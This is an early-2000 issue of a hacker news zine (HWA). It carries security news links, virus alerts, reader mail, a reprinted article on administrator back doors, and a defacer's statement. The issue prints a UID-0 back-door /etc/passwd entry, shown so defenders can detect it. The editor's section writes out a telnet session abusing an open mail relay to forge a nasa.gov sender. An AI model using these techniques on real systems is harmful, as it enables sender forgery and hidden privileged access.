"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
Since we provide only the links in this section, be prepared
for 404's - Ed
+++ When was the last time you backed up your important data?
s
++ Phony Tragedy Site Has Virus
Contributed by Slash
Alaska Airlines warns that a Web site seeking donations for victims of
Flight 261 is a phony and that it is carrying a virus.
Full Story <http://www.ukhackers.com/04020010.htm>
++ Tough U.S. Bank Privacy Regs
Contributed by Slash
U.S. regulators took a tough line Thursday on privacy protection for
personal financial information included in a historic overhaul of
Depression-era U.S. banking laws
Full Story <http://www.ukhackers.com/0402008.htm>
++ Patch Available for the Recycle Bin Creation Vulnerability
Contributed by Slash
Microsoft has released a patch that eliminates a security vulnerability
in Windows NT 4.0. This hole allows a malicious user to create, delete or
modify files in the Recycle Bin of another user who shared the machine.
Full Story <http://www.ukhackers.com/0402009.htm>
++ Behind the Scenes at 'Hackers, Inc.'
Contributed by Slash
Professional hackers roam Net to keep companies--and data--secure.
Full Story <http://www.ukhackers.com/0402007.htm>
++ The Nets Dark Side: Protecting Your Privacy May Empower Criminals
Contributed by Slash
Surfing the Web. You thought you knew how dangerous it could be.
But many Americans might be astonished at how easy it is to uncover
the most sensitive personal information.
Full Story <http://www.ukhackers.com/0402006.htm>
++ RSA Security's Industry-Leading Encryption Technology Offered
in OpenSite AuctionNow and OpenSite Dynamic Pricing Toolkit
Contributed by Slash
Full Story <http://www.ukhackers.com/0402005.htm>
++ Essential Security for DSL and Cable Modem Users
Contributed by Slash
Zone Labs, Inc., today announced the immediate availability of the
new ZoneAlarm 2.0 Internet security utility.
full Story <http://www.ukhackers.com/0402004.htm>
++ F-Secure, Hewlett Packard team up in WAP security
Contributed by Slash
Finnish computer security company F-Secure said on Thursday it would
develop security for Internet-enabled Wireless Application Protocol
(WAP)
full Story <http://www.ukhackers.com/0402003.htm>
++ Experts Warn of Web Surfing Risk
Contributed by Slash
Computer experts are warning of a serious new Internet security threat
that allows hackers to launch malicious programs on a victim's computer
Full Story <http://www.ukhackers.com/0402002.htm>
++ Teen Hacker's Home Raided (Business Tuesday)
http://www.wired.com/news/business/0,1367,33889,00.html?tw=wn20000126
The home of the 16-year-old hacker who launched three major lawsuits
was raided Monday in Norway, and the international hacking community is
reeling from the news. By Lynn Burke.
++ Echelon 'Proof' Discovered (Politics 3:00 a.m. PST)
http://www.wired.com/news/politics/0,1283,33891,00.html?tw=wn20000126
NSA documents refer to 'Echelon.' Is it the suspected international
citizen spying machine or the name of a legal military project? The
researcher who found them thinks it's the latter. By Chris Oakes.
++ Vodafone Gets Its Mannesmann (Business 6:00 a.m. PST)
http://www.wired.com/news/business/0,1367,34077,00.html?tw=wn20000203
The three-month-long hostile bid by Britain's telecom giant is finally
about to end ... in a friendly takeover.
++ VA Linux Snaps Up Andover (Business 6:50 a.m. PST)
http://www.wired.com/news/business/0,1367,34076,00.html?tw=wn20000203
The Linux software distributor pays an estimated $850 million in
stocks and cash for the network of tech-info sites, which includes the
esteemed Slashdot.
++ Thumbs Down on Net Wiretaps (Politics 3:00 a.m. PST)
http://www.wired.com/news/politics/0,1283,34055,00.html?tw=wn20000203
The controversy about Internet wiretaps -- which pitted the FBI and
the FCC against the ACLU and the EFF -- has ended with a recommendation
against online surveillance. Declan McCullagh reports from Washington.
++ Copy-Protected CDs Taken Back (Technology 3:00 a.m. PST)
http://www.wired.com/news/technology/0,1282,33921,00.html?tw=wn20000203
BMG Germany pulls the plug on its first effort to protect CDs from
piracy after customers complain that some of the music is unplayable.
By Chris Oakes.
++ Moveable Media: Stick or Card? (Technology 3:00 a.m. PST)
http://www.wired.com/news/technology/0,1282,34052,00.html?tw=wn20000203
A new industry consortium thinks it has the portable answer to secure
storage of music and more: a secure digital memory card. Microsoft
signed on Wednesday. Look out, Sony Memory Stick.
++ Net Tax May Get the Heave-Ho (Politics Wednesday)
http://www.wired.com/news/politics/0,1283,34075,00.html?tw=wn20000203
It's a matter of changing one sentence in existing legislation. But if
Congress approves, the threat of Internet taxation could vanish
forever. Or at least for Washington's idea of forever. Declan McCullagh
reports from Washington.
++ Class-Action Suit Calls on AOL (Politics Wednesday)
http://www.wired.com/news/politics/0,1283,34063,00.html?tw=wn20000203
A lawsuit alleges America Online's newest software disconnects users
from competing online accounts. The filing requests $8 billion in
damages for version 5.0 users.
++ RealNetworks Helps Pay Piper (Technology Wednesday)
http://www.wired.com/news/technology/0,1282,34026,00.html?tw=wn20000203
The Net's streaming media giant adds technology from AudioSoft to
facilitate royalty payments to copyright holders. The system will count
streams and send the data to the collecting agency. By Christopher
Jones.
++ Virtual Training for Real Jobs (Culture Wednesday)
http://www.wired.com/news/culture/0,1284,33897,00.html?tw=wn20000203
Technology may be the cornerstone of the new economy, but people
lacking skills are being shut out of the market. One Texas program is
trying to get them into the game. Katie Dean reports from Austin,
Texas.
++ But, How to Pronounce Dot EU? (Politics Wednesday)
http://www.wired.com/news/politics/0,1283,34045,00.html?tw=wn20000203
The European Commission, wanting a piece of the dot com pie, launches
an initiative to give businesses on the other side of the pond a
uniform suffix.
-=-
Security Portal News Shorts
-=-
++ Trend Micro Virus Alerts: TROJ_FELIZ and W97M_ARMAGID.A
<http://www.antivirus.com/vinfo/> - a Windows executable and Word macro
virus respectively, both are low risk viruses, not believed to be widespread
++ ComputerWorld: Y2K gives some admins a security education
<http://www.computerworld.com/home/print.nsf/all/000101D96E> - The threat of
online assaults had IT staffs on guard, but midnight came and went without
any serious security problems cropping up, according to experts monitoring
systems
++ ZDNet: Script virus looks to ring in new year
<http://www.zdnet.com/zdnn/stories/news/0,4586,2415783,00.html?chkpt=zdnntop
> - The first virus to get its own press release in the year 2000 appears
to be little more than a nuisance. Meanwhile, pirate-killer Trojan.Kill also
quiet
++ Jan 1, 2000
Symantec: PWSteal.Trojan Virus
<http://www.symantec.com/avcenter/venc/data/pwsteal.trojan.html> -
PWSteal.Trojan is a trojan which attempts to steal login names and
passwords. These passwords are often sent to an anonymous email address
CNN: CA warns of Y2K-triggered virus
<http://cnn.com/1999/TECH/computing/12/31/ca.virus.y2k/index.html>
- CA said the "Trojan.Kill_Inst98" virus will delete all the files
on an infected PC's C: drive when the system clock rolls over to
Jan. 1, 2000
++ Dec 31, 1999
NAI: Zelu Virus <http://vil.nai.com/vil/dos10505.asp> - This is an
MS-DOS executable which can destroy data on the hard drive. The original
filename as received to AVERT is Y2K.EXE and is 24,944 bytes in size. If
this file is run, it simulates checking the system for Y2K compliancy.
It is not however doing any such thing - it is trashing files on the
local system rendering the machine inoperable. Not believed to be
widespread.
++ CNN: CA warns of Y2K-triggered virus
<http://cnn.com/1999/TECH/computing/12/31/ca.virus.y2k/index.html>
- CA said the "Trojan.Kill_Inst98" virus will delete all the files on
an infected PC's C: drive when the system clock rolls over to Jan. 1,
2000
Y2K Status Update
<http://securityportal.com/topnews/y2k19991231-jwr-10.html> - no news is
good news
++ Sophos Virus Alert: WM97/Chantal-B
<http://www.sophos.com/virusinfo/analyses/wm97chantalb.html> -
WM97/Chantal-B is a Word macro virus which drops a batch file virus and a
Visual Basic script trojan horse. On the 31st of any month the virus
displays the Microsoft Office assistant with the message: "Y2K is Coming
Soon". If the year is 2000 the virus attempts to delete all files in the
current directory and in the root directory of the C: drive
Sophos Virus Alert: WM97/BackHand-A
<http://www.sophos.com/virusinfo/analyses/wm97backhanda.html> - If the date
is Friday the 13th the virus password protects the document with the
password "Trim(Two)". Then, if the year is 2000, it resets the computer's
date to 1/1/1980
++ CERT: Estimate of the Threat Posed by Y2K-Related Viruses
<http://www.cert.org/y2k-info/virus_threat_est.html> - About a dozen
Y2K-related viruses have been reported, but they are not widespread.
Moreover, because viruses have to be executed to operate and because most
people will not be at their keyboards as the date rolls over, the likelihood
of a significant virus event is low. As people return to work next week, the
virus risk may increase somewhat for all types of viruses, but there is no
reason to expect a major outbreak.
NAI Virus listing: ExploreZip.C or Minizip III
<http://vil.nai.com/vil/wm10493.asp> - This is another variant of the
original W32/ExploreZip.worm distributed earlier in 1999. This version is
different in that it is "localized" with Spanish error messages however will
function on English Windows systems. This edition was compressed using
another compression tool. Not currently rated as a high risk threat
++ Dec 30, 1999
ZDNet: Apple's OS 9 patch brings new problems
<http://www.zdnet.com/zdnn/stories/news/0,4586,2415488,00.html?chkpt=zdhpnew
s01> - Although many users were impressed by Apple's quick reaction this
week to the discovery of a potential security flaw in Mac OS 9, those users
who have applied the new OT Tuner 1.0 patch are reporting loss of all
network connectivity or crashes during startup. Apple says patched machines
simply need to be restarted
++ Sun Security Bulletin 192: CDE and OpenWindows
<http://securityportal.com/topnews/sun19991230-192.html> - Sun announces
the release of patches for Solaris 7, 2.6, 2.5.1, 2.5, 2.4, 2.3 (SunOS 5.7,
5.6, 5.5.1, 5.5, 5.4, 5.3), and SunOS 4.1.4, and 4.1.3_U1 which relate to
various vulnerabilities in CDE and OpenWindows
Sun Security Bulletin 191 sadmind
<http://securityportal.com/topnews/sun19991230.html> - Sun announces the
release of patches for Solaris 7, 2.6, 2.5.1, 2.5, 2.4, and 2.3 (SunOS 5.7,
5.6, 5.5.1, 5.5, 5.4 and 5.3), which relate to a vulnerability with sadmind
Thanks to myself for providing the info from my wired news feed and
others from whatever sources, Zym0t1c and also to Spikeman for sending
in past entries.... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
========================================================================
The message board is DEAD it was an experiment that failed. Perhaps
i'll revive a board when I can run some good board software on our
own host.
Don't be shy with your email, we do get mail, just not much of it
directed to other readers/the general readership. I'd really like to
see a 'readers mail' section. Send in questions on security, hacking
IDS, general tech questions or observations etc, hell we've even
printed poetry in the past when we thought it was good enough to
share.. - Ed
=======================================================================
Seen on security focus:
To: Security Jobs
Subject: Virus coder wanted
Date: Thu Jan 27 2000 00:18:44
Author: Drissel, James W.
Message-ID: <CD11F9F59C6BD3118BF5009027B0F53B0884EC@adp-exch-1.cmet.af.mil>
Computer Sciences Corporation in San Antonio, TX is looking for a good virus
coder. Applicants must be willing to work at Kelly AFB in San Antonio.
Other exploit experience is helpful.
Send Resumes/questions to james.drissel@cmet.af.mil
-=-
From: <pyr0-phreak@geeks404.com>
To: <hwa@press.usmc.net>
Sent: Wednesday, January 05, 2000 1:02 AM
Subject: Just some comments
Hello staff of HWA,
Just thought i would tell u guys that u r doin a pimp ass job and if its
alright i would like to put a link up on my webpage to this interesting and
informative site. Mail me back plez.
Pyr0-phreak@geeks404.com
www.crosswinds.net/~pyr0phreak
-=-
From: Andrew Nutter-Upham <nutterupham@earthlink.net>
To: <hwa@press.usmc.net>
Sent: Sunday, January 02, 2000 9:42 PM
Subject: about your site.
I love the newsletter, read every edition. but your site sucks. now i
don't blame you, a lot of people have problems with good site design. I do
web design as a part time job, and I'd like (just to be nice, for money of
course.) to redo the site, if that's ok with you, I could leach the site
down, but i think it'd be easier if you could just zip it up and send it to
me. if you like my revisions feel free to keep them. if not, that's ok too,
i just thought that I'd put in the offer. Think it over. thanks for listening.
-andy
It sure does suck, its getting pretty shoddy and out dated looking, a tad
ragged around the edges, i've done some minor patch-up mods to make things
better but don't have time to work on it in a major way, perhaps we can get
something going here... - Ed
-=-
From: Lascarmaster <Lascars@iquebec.com>
To: <CRUCIPHUX@DOK.ORG>
Sent: Monday, January 24, 2000 1:58 AM
Subject: [ AD! ]
Hello CRUCIPHUX,
hello from France
my site is a french hacker portal with some good links and news for
hackers ( in french i prefer the word lascar )
by the way , if you could place this ad on your next hwa.hax0r
digest, it could be very nice
try my site at http://lascars.cjb.net
______________________________________________________________
French Hackers' Portal / Le Portail Des Lascars Francophones
Links and News of interest / Liens et news pour lascars. ;-)
--------------------------------------------------------------
->->->->->->->->-> http://lascars.cjb.net <-<-<-<-<-<-<-<-<-
______________________________________________________________
Le portail des Lascars c'est http://Lascars.cjb.net
Lascarmaster mailto:Lascars@iquebec.com
______________________________________________________________________________
Si votre email etait sur iFrance vous pourriez ecouter ce message au tel !
http://www.ifrance.com : ne laissez plus vos emails loins de vous ...
gratuit sur i France : emails (20 MO, POP, FAX), Agenda, Site perso
-=-
From: Dragos Ruiu <dr@v-wave.com>
To: <cc: list omitted>
Sent: Tuesday, January 25, 2000 9:50 PM
Subject: kyxspam: IMxploits in the news
(First reported in Salon huh.?... Bay Area tunnel vision is an interesting
phenomenon. Has anyone made the definitive IM vulnerability
and exploit page yet? As in I'M owned. --dr :-)
Hack Takes Aim at AOL Clients
Wired News Report
5:30 p.m. 24.Jan.2000 PST A security breach on AOL Instant Messenger put
the privacy of AIM users at risk on Monday, according to a published
report.
The breach, first reported in Salon, allows subscribers to link new AOL
accounts to AIM names that already exist. Holes in the sign-up process
allow people to get around the password protection of the AIM accounts.
"We are aware of it and are deploying security measures to defeat it," said
Rich D'Amato, a spokesman for AOL.
AOL's online service is used to changed passwords, so hackers are easily
able to open new accounts usi
ng the existing AIM user's name.
People who subscribe to AOL are not affected by the breach. People who use
instant messaging software (AIM) outside of AOL, are.
D'Amato called the security breach an example of "hacker behavior that
crosses the line into illegal action."
"Our intention is to investigate this and when we identify an individual or
groups of individuals, we intend to bring this to the attention of the
proper law enforcement authorities," D'Amato said.
He declined to speculate on when the problem will be fixed or how many
users were affected, although he characterized it as "a very small number."
David Cassel, who edits the AOL Watch mailing list, claimed the security
hole was easily preventable. It was simply a matter of someone thinking
through the sign-on process.
"AOL left a gaping hole in the way they implemented it," Cassel wrote in an
email. "Those who happened to have an AOL account weren't vulnerable, but
everyone else was. To promote such an easily cracked software really
violates any reasonable expectation of security. In that sense, all AIM
users were affected."
"AOL is a marketing company, not a technology company," Cassel wrote.
"They mass-promoted a software that's vulnerable to easy attacks."
--
kyx.net
we're from the future - home of kanga-foo!
-=-
From: Dragos Ruiu <dr@v-wave.com> To: <cc: list omitted> Sent: Tuesday,
January 25, 2000 10:32 PM Subject: kyxspam: hacking for politics.
http://news.cnet.com/news/0-1005-200-1531134.html?tag=st.ne.ron.lthd.1005-2
00-1531134
Hackers attack Japanese government sites By Reuters Special to CNET
News.com January 25, 2000, 11:40 a.m. PT
TOKYO--Japanese officials suffered an embarrassment today when hackers
penetrated two government Web sites, leaving a message in one of them
criticizing the Japanese government's position on the 1937 Nanjing
Massacre.
Computer systems at Japan's Management and Coordination Agency were raided
yesterday, and its home page was replaced with derogatory messages
insulting the Japanese in the first-ever hacking of the country's
government computer system.
The hackers left a message on the Web site in Chinese blasting the Japanese
government for refusing to acknowledge that the Nanjing Massacre took
place, media reports said.
Jiji news agency said it had deciphered the message, which originally came
in garbled, to read: "The Chinese people must speak up to protest the
Japanese government for refusing to acknowledge the historical misdeed of
the 1937 Nanjing Massacre."
Hundreds and thousand of civilians were massacred by Imperial Army troops
during the 1937-38 occupation of the central Chinese city.
A meeting by ultrarightist Japanese in Osaka last weekend to whitewash the
incident, also called the Rape of Nanking, has whipped up new anger in
China, where hundreds marched through the streets of Nanjing to denounce
the conference.
The Chinese government lodged protests about the gathering. But the
Japanese government, which acknowledges that the incident was no
fabrication as some ultrarightists claim, failed to bar the group from
holding the weekend meeting.
A similar hacking incident occurred on Japan's Science and Technology
Agency's home page. Agency officials declined to give details of the
messages but said the home page was also replaced with a direct access
switch to adult magazine Web sites.
Top government spokesman Mikio Aoki said the government would launch an
extensive investigation into the hacking incidents, including possible help
from Washington, which is more advanced in dealing with hackers.
"The government must take all necessary measures including seeking help
from the United States," Aoki said at a news conference.
Officials said it was not immediately clear whether the same hacker was
responsible for the two separate cases of infiltration.
Story Copyright © 2000 Reuters Limited. All rights reserved.
-- kyx.net we're from the future - home of kanga-foo!
-=-
From: Dragos Ruiu <dr@v-wave.com>
To: <cc: list omitted>
Sent: Wednesday, January 26, 2000 5:15 PM
Subject: kyxspam: who watches the watchmen?
(tip o'de hat to rfp's site {wiretrip.net} that had this article link. Luv dem
skins... --dr)
http://www.sunworld.com/sunworldonline/swol-01-2000/swol-01-security.html
Who gets your trust?
Security breaches can come from those you least suspect
Summary
Systems administrators have extraordinary access to all the data on corporate
systems. What can be done to ensure that your administrators will not betray
that trust?
WIZARD'S GUIDE TO SECURITY
By Carole Fennelly
In the business world you will often hear the statement "We don't hire
hackers." When pressed for a reason, the speaker usually reveals a fear that a
"hacker" will install a back door in the system. Time and time again, however,
I have seen back doors installed by employees or security professionals whose
integrity is never questioned. When confronted, they usually say it's no big
deal. After all, they have the root password. They just wanted to set up a root
account with a different environment. That's not hacking, right? Wrong. Their
intention did not matter -- the security of the system has been bypassed.
This article discusses how administrative privileges can be abused and
suggests some methods for countering that abuse. It is not meant to imply that
every administrator abuses privileges or has malicious intent -- just that you
shouldn't assume anything.
What is a back door?
Quite simply, a back door is a method for gaining access to a system that
bypasses the usual security mechanisms. (Has everyone seen WarGames?)
Programmers and administrators love to stick back doors in so they can access
the system quickly to fix problems. Usually, they rely on obscurity to provide
security. Think of approaching a building with an elaborate security system
that does bio scans, background checks, the works. Someone who doesn't have
time to go through all that might just rig up a back exit so they can step out
for a smoke -- and then hope no one finds out about it.
In computer systems, a back door can be installed on a terminal server to
provide direct access to the console remotely, saving the administrator a trip
to the office. It can also be a program set up to invoke system privileges from
a nonprivileged account.
A simple back door is an account set up in the /etc/passwd file that looks
like any other userid. The difference is that this userid doesn't have to su to
root (and it won't show up in /var/adm/sulog) -- it already is root:
auser:x:0:101:Average User :/home/auser:/bin/ksh
If you don't see it, look again at the third field (userid) and compare it to
the root account. They are the same (0). If you are restricting direct root
logins to the console only (via /etc/default/login), then this account will
have the same limitation. The difference is that if someone does su to this
account, it will not be apparent in /var/adm/sulog that it is root. Also, a
change to the root password will not affect the account. Even if the person who
installed the account intends no harm, he or she has left a security hole.
It is also pretty common for an administrator to abuse the /.rhosts file by
putting in desktop systems "temporarily." These have a way of becoming
permanent.
Back doors can also be set up in subtler ways though SUID 0 programs (which
set the userid to root). Usually, the motivation for setting up back doors is
one of expediency. The administrator is just trying to get a job done as
quickly as possible. Problems arise later when either (1) he leaves under
normal circumstances and the hole remains or (2) he leaves under bad
circumstances and wants revenge.
Proprietary data
A manager may also be reluctant to hire "hackers" for fear that they may
divulge proprietary information or take copies of proprietary data. Several
years ago, I was consulting at a company when a new administrator joined the
group. In an effort to ingratiate himself with the team, he confided that he
had kept the backup tapes from his old job (a competitor) and that they had
some "really cool tools." It so happened that a consultant with my own business
worked at the competitor's site. A scan of the tape revealed the proprietary
software that the administrator had been working on, which eventually sold for
a significant amount of money. While the admin probably did not intend to steal
the software, his actions could have left his new employer facing a large
lawsuit -- all for the sake of a few shell scripts. In this particular case, no
one believed that the administrator had any ulterior motives. I wonder if
people would have felt that way if he had been a "known hacker"?
System monitoring
Administrators are supposed to monitor system logs. How else can problems be
investigated? But there is a difference between monitoring logs for a
legitimate reason and monitoring them to satisfy prurient curiosity. Using the
system log files to monitor a particular user's behavior for no good reason is
an abuse of privileges.
What is a good reason? Your manager asks you to monitor specific logs. Or
maybe you notice suspicious activities, in which case you should inform the
management. Or, more commonly, a user complains about a problem and you are
trying to solve it. What is a bad reason? A user ticks you off and you want to
see how he is spending company time. Or a user has a prominent position in the
company and you want to know what kinds of Websites she goes to.
Countermeasures
You can take some actions to ensure the integrity of privileged users, but
none of them carries any guarantee.
Background checks
You can have an investigative agency run a background check on an individual
and you can require drug tests. These tell you only about past behavior (if the
individual has been caught).
The state of New Jersey (where I live) has adopted a law commonly referred to
as Megan's Law (see Resources). The law mandates that a community be notified
of any convicted sex offender living in the community. On the surface, it
sounds like a great idea and a way to protect children from predators.
As a parent, I am particularly sensitive to crimes against children. I
received a Megan's Law notification this past year about a convicted sex
offender who moved into town. It did not change a thing for me. My feeling is
that every child molester has to have had a first time and that in any case not
all molesters have been identified. Therefore, I take appropriate precautions
with my children, regardless of who has moved to the area.
In the technical field, hackers are considered the molesters. (Yes, I know
all about the politically correct terms cracker, defacer, etc., but the common
term these days is hacker.) How do you know if someone is a "hacker"? Some
people try to refine the term to mean "someone who has been convicted of a
computer crime." But let's say, for example, that you attend Defcon, the
hackers' conference, and encounter an intelligent job seeker with bright blue
hair and funky clothes. Would you hire him? Chances are that you would at least
scrutinize his credentials and make sure your contract spelled out all details
of the work to be performed and the legal repercussions for any violations.
What if the same person showed up for an interview with the blue dye rinsed out
and in a nice pressed suit? Be honest: would you perform the same background
checks regardless of a person's appearance?
Technical measures
Some technical software packages can limit or control superuser privileges. I
recommend using them to prevent the inadvertent abuse of superuser privilege.
Unfortunately, knowledgeable administrators and programmers with privileged
access will be able to circumvent these measures if they really want to.
sudo
The freely available sudo package provides more granular control over the
system by restricting which privileged commands can be run on a user basis. See
Resources for the Sudo main page, which has a more complete description.
Tripwire
Tripwire is a file integrity package that, following the policy determined by
the administrator, reports any changes made to critical files. Tripwire was
originally developed at Purdue University by Gene Kim under the direction of
Eugene Spafford. I plan to evaluate the merits of the commercial version of
Tripwire in a future column. Tripwire is a good way for an administrator to
tell whether the system files or permissions have been modified.
What can be done, however, if the senior administrator who monitors the
system has malicious intent?
Professionalism
The best defense against the abuse of administrator privileges is to rely on a
certain level of professionalism. The medical Hippocratic oath includes the
mandate Do No Harm. While there is no such professional oath for systems
administrators, you can establish guidelines for acceptable behavior. During
the mid-1980s, I worked as an administrator in a computer center at a large
telecommunications research facility. We had a code of ethics that a user had
to sign before an account could be installed. We also had a code of ethics for
privileged users that included additional restrictions, such as:
No SUID 0 (set userid to root) programs will be installed without the
consent, in writing, of the senior administrator.
All users' email is to be considered private and confidential and may not be
read by anyone other than the intended recipient.
Users' files may not be modified or read except in the case of a
predetermined problem or security investigation. Be prepared to justify.
Privileged users are often entrusted with sensitive information, such as an
employee termination, before other employees. This information is to be kept
confidential.
The root passwords are changed monthly and are to be distributed by the
senior administrator only. The passwords must be kept in a safe location, such
as your wallet. If the password is lost, notify the senior administrator or
your manager immediately.
Keystroke monitoring of user activities is strictly prohibited without senior
management approval, in writing.
All administrative procedures and tools are to be considered proprietary
information and are the property of the computer center.
Tape archives may not be removed from the facility without written approval.
Discretion
A code of ethics for privileged users should not be considered a punitive
device, but rather a statement about the integrity of the person who signs it.
At one point during my years in the computer center, the secretary to the
president of the company came to me with a printer problem. As I was assisting
her, she became upset when she realized that the test job she had sent to the
printer was highly confidential. I was able to reassure her that all
administrators were bound by a code of ethics and would be terminated for
violations. (Besides, I wasn't really reading it, I was just looking for
garbage characters!) Professionals must establish a certain level of trust.
This is especially important for those privy to sensitive information regarding
terminations or investigations.
Final thoughts
Would I hire someone who showed up for an interview with blue hair, body
piercings, and a name like 3v1l HaK0rZ? No. Not because he might install a back
door, but because he was ignorant about what was acceptable on Wall Street. As
for the back doors? More are installed by well-groomed "professionals" in suits
than by "hackers." Anyone with the required skills can be either a "security
consultant" or a "hacker." The only difference is the label.
Disclaimer: The information and software in this article are provided as-is
and should be used with caution. Each environment is unique, and readers are
cautioned to investigate, with their companies, the feasibility of using the
information and software in this article. No warranties, implied or actual, are
granted for any use of the information and software in this article, and
neither the author nor the publisher is responsible for any damages, either
consequential or incidental, with respect to the use of the information and
software contained herein.
s
About the author
Carole Fennelly is a partner in Wizard's Keys Corporation, a company
specializing in computer security consulting. She has been a Unix system
administrator for almost 20 years on various platforms and of late has focused
on sendmail configurations. Carole provides security consultation to several
financial institutions in the New York City area.
--
kyx.net
we're from the future - home of kanga-foo!
-=-
02.0 From the editor.
~~~~~~~~~~~~~~~~
_____ _ _ _ _
| ____|__| (_) |_ ___ _ __( )__
| _| / _` | | __/ _ \| '__|/ __|
| |__| (_| | | || (_) | | \__ \
___|_____\__,_|_|\__\___/|_| |___/
/ ___| ___ __ _ _ __ | |__ _____ __
\___ \ / _ \ / _` | '_ \| '_ \ / _ \ \/ /
___) | (_) | (_| | |_) | |_) | (_) > <
|____/ \___/ \__,_| .__/|_.__/ \___/_/\_\
|_|
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/*
* Yes we've wavered from our weekly release schedule, sorry
* about that, i've been indulging in other projects requiring
* more of my time (network IDS related etc) but you will find
* pretty much full coverage of the time period Jan 16th to Feb
* 12th or so included in this issue.
*
* I've rearranged stuff a little, i've moved some of the fodder
* that i'm sure was annoying some people and definately at
* at least one (grin) to the END of the newsletter, into the
* appendices where it should probably have been in the first
* place. So if you're looking for the gov and mil sites that
* have scoured our site or want to check the FAQ or our source
* or resource lists etc, they have all been moved to the back
* so now you can more or less 'dive in' to the news material
* and content without paging thru stuff you may have already
* seen a million times.
*
* Also did a slight modification/clean up of the website, its
* going to be redone but meanwhile i've made it a little less
* cumbersome and easier to navigate. Also added a toy or two
* want a user@hax0r-news.zzn.com mail address? I knew you did
* (heh) well now you can, just follow the link and away you
* go to yet another web based mail account...sorry appears to
* be no forwarding. <beh>
*
* This will include alot of HNN rehashed material, i'm working
* on automating the retreival of certain news sources for time
* saving in creating these issues, since we have access to
* other sources of info that don't get explored as often as
* I'd like, also keeping up with exploits is not so difficult
* now that packetstorm no longer has the contact base it once
* did. If you can suggest sites that get 0-day (grin) or current
* exploit code or the sites of the coders themselves, please
* send in the url/list info etc so we can keep everyone up to
* date.
*
* I shall finally be asking some help from people, I can no
* longer do this by myself to my satisfaction, so I hope to
* enlist some eager beavers with time to kill on this project
* rather than let release dates drift further and further
* apart.
*
*
* Things are a bit messy and not necessarily in chronological
* order, I don't like it but thats the way it turned out, I
* really need to spend more time on this to get it organized
* more neatly and make it more accessible, comments welcome.
*
* We need more submissions!, if you submit to security NG's or
* mailing lists about exploits or security concerns that you
* think may be of interest to our readers, consider CC: a copy
* to me for inclusion here. I try and cover a broad spectrum
* (perhaps too broad) of security/hacker related material and
* as such a little help with material would be most appreciated.
*
* mucho props out to Zym0t1c who is contributing more and more
* to the zine lately, thanks dude!
*
* Cruci
*
* cruciphux@dok.org
* Preffered chat method: IRC Efnet in #HWA.hax0r.news
*
*/
printf ("EoF.\n");
}
Snailmail:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
Anonymous email:
telnet (wingate ip) (see our proxies list)
Wingate>0.0.0.0
Trying 0.0.0.0...
Connected to target.host.edu
Escape character is '^]'.
220 target.host.edu ESMTP Sendmail 8.9.3/8.9.3; Sun, 6 Feb 2000 17:21:00 -0500 (EST)
HELO bogus.com
250 target.host.edu Hello ~ereet@target.host.edu [ 0.0.0.0 ], pleased to meet you
MAIL FROM: admin@nasa.gov
250 admin@nasa.gov... Sender ok
RCPT TO: cruciphux@dok.org
250 cruciphux@dok.org... Recipient ok
DATA
Secret cool infoz
.
QUIT
If you got that far everything is probably ok, otherwise you might see
550 cruciphux@dok.org... Relaying denied
or
550 admin@nasa.gov... Domain must exist
etc.
* This won't work on a server with up to date rule sets denying relaying and your
attempts will be logged so we don't suggest you actually use this method to
reach us, its probably also illegal (theft of service) so, don't do it. ;-)
-=-
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mai*lbombs can go to /dev/nul nukes, synfloods, trinoo and tribe
or ol' papasmurfs to 127.0.0.1,
private mail to cruciphux@dok.org
danke.
C*:.
-= start =--= start =--= start =--= start =--= start =--= start =--= start
____ _ _
/ ___|___ _ __ | |_ ___ _ __ | |_
| | / _ \| '_ \| __/ _ \ '_ \| __|
| |__| (_) | | | | || __/ | | | |_
\____\___/|_| |_|\__\___|_| |_|\__|
/ ___|| |_ __ _ _ __| |_
\___ \| __/ _` | '__| __|
___) | || (_| | | | |_
|____/ \__\__,_|_| \__|
-= start =--= start =--= start =--= start =--= start =--= start =--=
03.0 Slash, Croatian cracker, speaks out
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following is from one of the last defacements that Slash has done, he
has since renounced defacing and is starting a new security group called
b0f (Buffer Overflow) we'll keep you posted as this develops. - Ed
Defaced by slash [ 2.1.2000 ] Original site here
(http://www.attrition.org/mirror/attrition/2000/01/08/www.badjura-petri.com/index-old.html)
www.badjura-petri.com - I got some interesting mail in the last few days that I
want to share with You. The first one is from a Security Consultant David Hove, who
works for a company named "RISCmanagment Inc." (www.riscman.com), and this is
what he wrote to me in his mail :
------
Numb Nuts,
Your judgments lay upon broken young souls who know no better. Let it be! Hackers
will hack regardless of holes previously exploited. If the sys adm does not fix their
holes this is not the issue. Hacking for fame is not the issue. You yourself mailed your
hack in for recognition did you not. STOP THE HYPOCRISY AND SIMPLY HACK. Who
the hell are U to dictate what should be placed on a defaced website? I personally
work the other side of the fence specializing in keeping you out but thoroughly enjoy
watching you and others like you go about your daily routine. Exploiting port 80,
buffer overflows, running your little scripts, ect. Fuck ethics! The harder you try to
hack the more aware we become as admins. For those admins who do not keep up
Fuckem!
David Hove
Security Consultant
CCSA/CCSE
RISCmanagement Inc.
www.riscman.com
-------
Deer Mr. David, your email made me very sad because I realized that people don't
get the message I'm trying to say. Hacking previously hacked sites is considered lame,
and yes, hacking for fame is the issue. Hackers now adays hack only to get media
attention. In my country a 16 year old Back Orifice user was raided for "hacking" a
computer of a Croatian politian. The media made a national hero out of him. In the
interview he said that he could hack into a bank with just two of his friends and a
good computer. Now, people who read that newspaper bought the story, but people
who know young Denis via IRC can confirm that he is a complete idiot an a lamer. His
parents are so proud of him, not knowing that anyone can "hack" using Back
Orifice.
About me mailing my hack to attrition. Yes, I did mail the hack to attrition, you
know why !? I deface to spread the message out. I personally think if I just deface
the site that people wont notice it. So I report it to attrition and they put a mirror of
the site I defaced so other people can view it too. I don't do it for the fame. I could
hack under a different name everytime, but this is my style. I don't got braging on IRC
"I hacked this..", "I hacked that..". I don't have to prove my skillz to anyone. People
can respect me or hate me. I sincerely doubt that defacing a site will make me look
